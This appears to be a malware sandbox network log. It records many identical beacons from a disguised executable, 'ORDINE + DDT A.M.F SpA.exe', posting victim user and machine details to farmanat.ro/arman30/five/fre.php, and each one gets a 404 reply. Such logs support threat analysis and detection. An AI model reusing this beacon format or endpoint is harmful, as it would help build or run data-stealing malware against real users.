                                              Nov 25, 2021 10:48:11.469665051 CET6327OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:11.503652096 CET6328OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:11.553739071 CET6328INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              160192.168.11.2050001176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:32.411503077 CET6540OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:32.444843054 CET6540OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:32.494329929 CET6541INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              161192.168.11.2050002176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:32.838212013 CET6541OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:32.871723890 CET6542OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:32.929130077 CET6542INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              162192.168.11.2050003176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:33.371009111 CET6543OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:33.405335903 CET6543OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:33.455444098 CET6543INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              163192.168.11.2050004176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:33.891068935 CET6544OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:33.924673080 CET6544OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:33.998054981 CET6545INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              164192.168.11.2050005176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:34.420368910 CET6545OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:34.454618931 CET6546OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:34.506170988 CET6546INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              165192.168.11.2050006176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:34.921608925 CET6547OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:34.955773115 CET6547OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:35.006596088 CET6547INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              166192.168.11.2050007176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:35.381644964 CET6548OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:35.415180922 CET6548OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:35.470386028 CET6549INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              167192.168.11.2050008176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:35.899719000 CET6549OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:35.933382034 CET6550OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:35.990776062 CET6550INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              168192.168.11.2050009176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:36.430850029 CET6551OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:36.465001106 CET6551OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:36.515178919 CET6551INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              169192.168.11.2050010176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:36.941066980 CET6552OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:36.975271940 CET6552OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:37.025207996 CET6553INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              17192.168.11.2049852176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:12.137739897 CET6329OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:12.172027111 CET6329OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:12.222152948 CET6329INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              170192.168.11.2050011176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:37.484066010 CET6553OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:37.518367052 CET6554OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:37.573867083 CET6554INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              171192.168.11.2050012176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:37.955485106 CET6555OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:37.989485979 CET6555OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:38.039424896 CET6555INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              172192.168.11.2050013176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:38.463778019 CET6556OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:38.497083902 CET6556OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:38.545901060 CET6557INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:37 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              173192.168.11.2050014176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:38.976726055 CET6557OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:39.010889053 CET6558OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:39.060950041 CET6558INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              174192.168.11.2050015176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:39.500286102 CET6559OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:39.533838034 CET6559OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:39.590012074 CET6559INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              175192.168.11.2050016176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:40.035713911 CET6560OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:40.069422007 CET6560OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:40.120172977 CET6561INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              176192.168.11.2050017176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:40.546892881 CET6561OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:40.581239939 CET6561OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:40.630784988 CET6562INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
